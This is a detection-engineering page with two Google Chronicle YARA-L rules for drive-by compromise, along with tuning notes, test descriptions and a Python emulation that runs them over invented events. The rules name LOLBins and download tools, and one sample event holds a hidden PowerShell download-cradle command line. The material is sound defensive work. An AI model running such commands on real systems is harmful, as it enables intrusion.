T1189 Google Chronicle · YARA-L

Detect Drive-by Compromise in Google Chronicle

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. Drive-by compromise occurs when exploit code is delivered through a browser, often via a compromised legitimate website (watering hole), malicious advertising (malvertising), or injected iframes/scripts. Upon visiting the malicious page, browser or plugin exploits execute code silently, commonly resulting in the browser spawning unexpected child processes, writing executables to disk, or making unusual outbound network connections that establish C2 channels. This technique is particularly dangerous because it requires no user interaction beyond visiting a page and is frequently used for targeted attacks against specific communities or industries.

MITRE ATT&CK

Tactic
Initial Access
Technique
T1189 Drive-by Compromise
Canonical reference
https://attack.mitre.org/techniques/T1189/

YARA-L Detection Query

Google Chronicle (YARA-L)
rule t1189_drive_by_compromise {
  meta:
    author = "df00tech"
    description = "Detects drive-by compromise: browser processes spawning suspicious child processes (LOLBins and script hosts)"
    severity = "HIGH"
    priority = "HIGH"
    mitre_attack_tactic = "Initial Access"
    mitre_attack_technique = "T1189"
    mitre_attack_url = "https://attack.mitre.org/techniques/T1189/"
    reference = "https://attack.mitre.org/techniques/T1189/"

  events:
    // Browser (parent) launching a LOLBin or script host (child).
    // (?i) makes the RE2 match case-insensitive; the patterns anchor on the image name only.
    $proc_event.metadata.event_type = "PROCESS_LAUNCH"
    $proc_event.principal.process.file.full_path = /(?i)(chrome\.exe|firefox\.exe|msedge\.exe|microsoftedge\.exe|iexplore\.exe|opera\.exe|brave\.exe)$/
    $proc_event.target.process.file.full_path = /(?i)(powershell\.exe|cmd\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|certutil\.exe|bitsadmin\.exe|wmic\.exe|msiexec\.exe|schtasks\.exe|at\.exe|net\.exe|netsh\.exe|sc\.exe|reg\.exe|bash\.exe|sh\.exe|curl\.exe|wget\.exe)$/
    $proc_event.principal.hostname = $hostname

  match:
    $hostname over 5m

  outcome:
    // With a match section the window can hold several events, so every outcome
    // variable that reads an event field must go through an aggregation function.
    $risk_score = max(85)
    $detection_type = "BrowserSpawnedSuspiciousChild"
    $event_count = count_distinct($proc_event.metadata.id)
    $browser_process = array_distinct($proc_event.principal.process.file.full_path)
    $child_process = array_distinct($proc_event.target.process.file.full_path)
    $command_line = array_distinct($proc_event.target.process.command_line)
    $user = array_distinct($proc_event.principal.user.userid)

  condition:
    $proc_event
}

rule t1189_drive_by_browser_file_write {
  meta:
    author = "df00tech"
    description = "Detects drive-by compromise: browser writing executable or script files to writable user directories"
    severity = "HIGH"
    priority = "HIGH"
    mitre_attack_tactic = "Initial Access"
    mitre_attack_technique = "T1189"
    mitre_attack_url = "https://attack.mitre.org/techniques/T1189/"

  events:
    // Browser creating an executable/script in a user-writable directory, excluding the
    // browser's own profile, cache, update and crash-report paths. In a YARA-L regex literal
    // a literal backslash is written as \\ .
    $file_event.metadata.event_type = "FILE_CREATION"
    $file_event.principal.process.file.full_path = /(?i)(chrome\.exe|firefox\.exe|msedge\.exe|microsoftedge\.exe|iexplore\.exe|opera\.exe|brave\.exe)$/
    $file_event.target.file.full_path = /(?i)\.(exe|dll|bat|ps1|vbs|js|hta|scr|pif|com)$/
    $file_event.target.file.full_path = /(?i)(\\Temp\\|\\AppData\\|\\Downloads\\|\\Public\\|\\ProgramData\\)/
    not $file_event.target.file.full_path = /(?i)(\\Chrome\\|\\Firefox\\|\\Edge\\|Cache|Update|CrashReport)/
    $file_event.principal.hostname = $hostname

  match:
    $hostname over 5m

  outcome:
    $risk_score = max(80)
    $detection_type = "BrowserWroteExecutableToDisk"
    $event_count = count_distinct($file_event.metadata.id)
    $browser_process = array_distinct($file_event.principal.process.file.full_path)
    $dropped_file = array_distinct($file_event.target.file.full_path)
    $user = array_distinct($file_event.principal.user.userid)

  condition:
    $file_event
}
Severity: high. Confidence: high.

Two YARA-L 2.0 rules for Google Chronicle detecting T1189 drive-by compromise. Rule 1 fires on PROCESS_LAUNCH events where a browser process is the parent of a LOLBin or scripting engine. Rule 2 fires on FILE_CREATION events where a browser drops an executable or script payload into a user-writable directory outside normal browser cache/update paths. Both match on $hostname over 5m, so repeated hits on one host inside a window roll up into a single detection, and both key on Windows image names (.exe), so browser telemetry from macOS or Linux endpoints is not covered by these rules.

Data Sources

  • Google Chronicle (UDM)
  • Windows Sysmon via Chronicle Forwarder
  • Microsoft Defender for Endpoint via Chronicle integration

Required Tables

UDM Events (PROCESS_LAUNCH, FILE_CREATION)

False Positives & Tuning

  • Browser-based remote desktop or screen-sharing tools (e.g., TeamViewer Web, AnyDesk browser launch) that drop helper executables to AppData during session initialization
  • Enterprise intranet portals distributing VPN client updates or certificate installers that cause the browser to write .exe files to Downloads followed by msiexec.exe execution
  • Browser extensions with native messaging hosts that write compiled helper binaries to AppData\Local during first-run setup, legitimately spawning cmd.exe to complete installation
  • Rule 2's exclusion list is a bare, case-insensitive substring match (Cache, Update, CrashReport), so any dropped file whose path or name contains one of those words (an update_helper.exe in Temp, for instance) is suppressed as well as the browser's own directories. If that blind spot matters, anchor the exclusion on a directory separator (e.g. \\Update\\) rather than the bare word.

Testing Methodology

Validate this detection against four Atomic Red Team tests. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Simulate Browser Spawning cmd.exe (Drive-by Code Execution Indicator)

    Expected signal: Sysmon Event ID 1: Process Create with Image=cmd.exe, ParentImage=chrome.exe (or reflected PID). Security Event ID 4688 if process auditing is enabled. The process tree should show chrome.exe -> cmd.exe -> whoami.exe. This is exactly the shape rule 1 fires on: one PROCESS_LAUNCH with a browser parent and a listed child is enough; the 5m match window only decides how many such launches on the same host are grouped into one detection.

  2. Test 2: Browser Writing Executable to Temp Directory

    Expected signal: Sysmon Event ID 11: File Create with TargetFilename=%TEMP%\update_helper.exe. The initiating process is powershell.exe in this test (in a real scenario it would be chrome.exe or similar); the file creation timestamp and SHA256 hash are logged. Note that rule 2 will not fire on this test as written, for two independent reasons: the writer is not one of the listed browsers, and the file name contains "update", which the rule's case-insensitive Update exclusion suppresses. Use it to confirm that FILE_CREATION telemetry reaches Chronicle, not to exercise the rule.

  3. Test 3: Malvertising Redirect Chain DNS Lookup Pattern

    Expected signal: Sysmon Event ID 22: DNS Query for each of the five test domains, all initiated by cmd.exe within seconds of each other. The Windows DNS Client event log also records these queries, and all of them return NXDOMAIN because the domains do not exist. Neither rule on this page consumes DNS events, so this test validates the network telemetry pipeline rather than the detections above.

  4. Test 4: Browser Push Notification Abuse Simulation (Malicious Script via Notification Click)

    Expected signal: Sysmon Event ID 1: powershell.exe process created with -WindowStyle Hidden and Invoke-WebRequest in the command line. Sysmon Event ID 3: network connection attempt to 127.0.0.1:9999 (it fails with no listener, but the attempt is logged). PowerShell ScriptBlock Logging Event ID 4104 captures the download cradle. Rule 1 fires only if the parent of that powershell.exe is one of the listed browser images; if the simulation launches it from a console instead, expect the Sysmon and PowerShell events but no Chronicle detection.
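To see the two rules' logic end to end without a Chronicle tenant, here is an added Python emulation. It is not part of df00tech's detection package and not Chronicle's rule engine: it applies the same regular expressions the two rules use to a handful of constructed, UDM-shaped events, groups the hits per hostname into 5-minute windows the way `match: $hostname over 5m` does, and builds the aggregated outcome values. The events are invented to mirror the shapes of Test 1, Test 2 and Test 4 above plus the native-messaging helper from the tuning notes; hostnames, user names and paths are made up, the nested dict layout is an approximation of UDM, and the tumbling window is a simplification of Chronicle's matching.

```python
"""Emulates the two YARA-L rules above over constructed UDM-shaped events (offline, no Chronicle)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Regular expressions as used in the rules; RE2's (?i) flag is valid in Python's re as well.
BROWSER_RE = re.compile(r"(?i)(chrome\.exe|firefox\.exe|msedge\.exe|microsoftedge\.exe|iexplore\.exe|opera\.exe|brave\.exe)$")
SUSPICIOUS_CHILD_RE = re.compile(r"(?i)(powershell\.exe|cmd\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|"
                                 r"regsvr32\.exe|certutil\.exe|bitsadmin\.exe|wmic\.exe|msiexec\.exe|schtasks\.exe|"
                                 r"at\.exe|net\.exe|netsh\.exe|sc\.exe|reg\.exe|bash\.exe|sh\.exe|curl\.exe|wget\.exe)$")
PAYLOAD_EXT_RE = re.compile(r"(?i)\.(exe|dll|bat|ps1|vbs|js|hta|scr|pif|com)$")
USER_WRITABLE_RE = re.compile(r"(?i)(\\Temp\\|\\AppData\\|\\Downloads\\|\\Public\\|\\ProgramData\\)")
BROWSER_INTERNAL_RE = re.compile(r"(?i)(\\Chrome\\|\\Firefox\\|\\Edge\\|Cache|Update|CrashReport)")
MATCH_WINDOW = timedelta(minutes=5)  # match: $hostname over 5m


def field(event, path):
    """Read a dotted UDM path such as 'principal.process.file.full_path'; None if absent."""
    node = event
    for key in path.split("."):
        if not isinstance(node, dict) or key not in node:
            return None
        node = node[key]
    return node


def rule_browser_spawned_child(event):
    """Rule 1 events section: PROCESS_LAUNCH with a browser parent and a LOLBin/script-host child."""
    return (field(event, "metadata.event_type") == "PROCESS_LAUNCH"
            and BROWSER_RE.search(field(event, "principal.process.file.full_path") or "") is not None
            and SUSPICIOUS_CHILD_RE.search(field(event, "target.process.file.full_path") or "") is not None)


def rule_browser_wrote_payload(event):
    """Rule 2 events section: a browser creates an executable/script in a user-writable directory,
    minus paths that look like the browser's own profile/cache/update tree (the `not ... = /.../` line)."""
    path = field(event, "target.file.full_path") or ""
    return (field(event, "metadata.event_type") == "FILE_CREATION"
            and BROWSER_RE.search(field(event, "principal.process.file.full_path") or "") is not None
            and PAYLOAD_EXT_RE.search(path) is not None
            and USER_WRITABLE_RE.search(path) is not None
            and BROWSER_INTERNAL_RE.search(path) is None)


RULES = {  # rule name -> (events predicate, $risk_score)
    "t1189_drive_by_compromise": (rule_browser_spawned_child, 85),
    "t1189_drive_by_browser_file_write": (rule_browser_wrote_payload, 80),
}


def matching_rules(event):
    """Rule names whose events section a single event satisfies (before windowing)."""
    return [name for name, (predicate, _) in RULES.items() if predicate(event)]


def window_groups(hits):
    """Split time-ordered hits into 5-minute groups, each anchored on its first hit."""
    groups, start = [], None
    for ev in hits:
        ts = datetime.fromisoformat(field(ev, "metadata.event_timestamp"))
        if start is None or ts - start > MATCH_WINDOW:
            groups.append([])
            start = ts
        groups[-1].append(ev)
    return groups


def run_rules(events):
    """One detection per (rule, hostname, window); outcome values aggregated the way a
    match-section rule must aggregate them (max / count_distinct / array_distinct)."""
    detections = []
    ordered = sorted(events, key=lambda e: field(e, "metadata.event_timestamp"))
    for rule_name, (predicate, risk_score) in RULES.items():
        per_host = defaultdict(list)
        for ev in ordered:
            if predicate(ev):
                per_host[field(ev, "principal.hostname")].append(ev)
        for hostname, hits in per_host.items():
            for group in window_groups(hits):
                detections.append({
                    "rule": rule_name, "hostname": hostname,
                    "risk_score": risk_score,                                              # max(85) / max(80)
                    "event_count": len(group),                                             # count_distinct(metadata.id)
                    "users": sorted({field(e, "principal.user.userid") for e in group}),  # array_distinct(...)
                    "events": group,
                })
    return detections


def udm(ts, event_type, hostname, user, parent, child=None, cmdline=None, file=None):
    # Minimal nested UDM-shaped event; constructed sample data, not real telemetry.
    ev = {"metadata": {"event_type": event_type, "event_timestamp": ts},
          "principal": {"hostname": hostname, "user": {"userid": user}, "process": {"file": {"full_path": parent}}},
          "target": {}}
    if child:
        ev["target"]["process"] = {"file": {"full_path": child}, "command_line": cmdline}
    if file:
        ev["target"]["file"] = {"full_path": file}
    return ev


CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

EVENTS = [  # constructed; hostnames, users and paths are invented
    # 0: Test 1 shape, chrome.exe -> cmd.exe -> whoami: rule 1 fires
    udm("2024-05-01T10:00:00", "PROCESS_LAUNCH", "ws01", "alice", CHROME, child=CMD, cmdline="cmd.exe /c whoami"),
    # 1: Test 4 shape, 2.5 minutes later on the same host: joins the same 5m detection
    udm("2024-05-01T10:02:30", "PROCESS_LAUNCH", "ws01", "alice", CHROME, child=PS,
        cmdline="powershell.exe -WindowStyle Hidden Invoke-WebRequest http://127.0.0.1:9999/s.ps1"),
    # 2: powershell.exe -> cmd.exe: the parent is not a browser, rule 1 stays silent
    udm("2024-05-01T10:00:00", "PROCESS_LAUNCH", "ws02", "bob", PS, child=CMD, cmdline="cmd.exe /c whoami"),
    # 3: msedge.exe drops an .exe into Downloads: rule 2 fires
    udm("2024-05-01T10:01:00", "FILE_CREATION", "ws01", "alice", EDGE, file=r"C:\Users\alice\Downloads\invoice_viewer.exe"),
    # 4: native-messaging helper under the Chrome profile: suppressed by the \Chrome\ exclusion
    udm("2024-05-01T10:01:05", "FILE_CREATION", "ws01", "alice", CHROME,
        file=r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Extensions\hostbridge\native_host.exe"),
    # 5: Test 2 shape, powershell.exe writes %TEMP%\update_helper.exe: rule 2 does not fire, both because
    #    the writer is not a browser and because 'update_helper' matches the (?i)Update exclusion
    udm("2024-05-01T10:00:00", "FILE_CREATION", "ws03", "bob", PS, file=r"C:\Users\bob\AppData\Local\Temp\update_helper.exe"),
    # 6: chrome.exe -> mshta.exe seven minutes after event 0: a second 5m window, hence a second detection
    udm("2024-05-01T10:07:00", "PROCESS_LAUNCH", "ws01", "alice", CHROME, child=r"C:\Windows\System32\mshta.exe",
        cmdline=r"mshta.exe C:\Users\alice\AppData\Local\Temp\p.hta"),
]

if __name__ == "__main__":
    for d in run_rules(EVENTS):
        print(f"{d['rule']}: host={d['hostname']} risk={d['risk_score']} events={d['event_count']} users={d['users']}")
```

Running it yields three detections: two for rule 1 on ws01 (the first grouping events 0 and 1, the second holding event 6 alone, because it falls outside the first 5-minute window) and one for rule 2 on ws01 (event 3). Events 2, 4 and 5 produce nothing, and event 5 is the interesting one: `matching_rules(EVENTS[5])` is empty even though the file lands in Temp, which is the same reason the Test 2 simulation cannot exercise rule 2 as written.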

Unlock Pro Content

Get the full detection package for T1189 including response playbook, investigation guide, and atomic red team tests.

  • Response Playbook
  • Investigation Guide
  • Hunting Queries
  • Atomic Red Team Tests
  • Tuning Guidance

Related Detections